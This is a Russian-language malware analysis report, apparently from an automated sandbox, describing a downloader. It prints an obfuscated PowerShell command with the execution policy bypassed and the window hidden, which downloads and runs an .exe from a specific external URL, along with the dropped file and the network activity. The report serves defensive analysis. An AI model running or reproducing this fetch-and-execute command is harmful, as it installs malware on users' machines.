Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://nsholiday.com/wp-content/plugins/huwjzr/4dui5.exe как %appdata%.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c "poWe^rShel^l.E^x^e^ -EXE^Cu^TIO^n^POlIcY ^bYP^asS^ -^N^o^p^r^O^Fil^E -W^iNdoWS^T^Y^le ^HiDDEn ^(NE^W-^objeCt syS^Te^m.^N^Et.^WEbC^L^I^EnT).dOW^NlO^a^DFILE('http://nsholida...
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%.exe
Сетевая активность
Подключается к
- 'ns###iday.com':80
TCP
Запросы HTTP GET
- http://ns###iday.com/wp-content/plugins/HUwjZr/4DUi5.exe
UDP
- DNS ASK ns###iday.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c "poWe^rShel^l.E^x^e^ -EXE^Cu^TIO^n^POlIcY ^bYP^asS^ -^N^o^p^r^O^Fil^E -W^iNdoWS^T^Y^le ^HiDDEn ^(NE^W-^objeCt syS^Te^m.^N^Et.^WEbC^L^I^EnT).dOW^NlO^a^DFILE('http://nsholida...' (со скрытым окном)
